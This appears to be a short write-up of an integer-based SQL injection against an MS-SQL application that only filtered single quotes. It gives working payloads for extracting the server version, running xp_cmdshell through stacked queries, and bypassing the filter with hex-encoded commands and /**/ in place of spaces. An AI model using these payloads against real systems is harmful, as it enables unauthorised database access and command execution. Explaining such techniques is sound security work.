I recently encountered a SQL Injection, against a MS-SQL database. It happened to be an integer based injection. Developers thought, that checking for a single quote(') in the input, would be sufficient to protect against SQL Injection attacks. What this meant was i can ask the server to return information like this:-
id=1 and 1=(select @@version)--
However, becuase the application checks for single quote in input, i could not run this query successfully:-
id=1; exec master..xp_cmdshell('ping 127.0.0.1');--
This could , however be bypassed by using a simple hex encoding trick.
id=1;declare/**/@a/**/varchar(999)/**/set@a=0x65786563
206d617465722e2e78705f636d647368656c6c282770696e6720
3132372e302e302e312729/**/exec(@a);--
In the above example, there is also a small trick to bypass white space protection in the input by using /**/.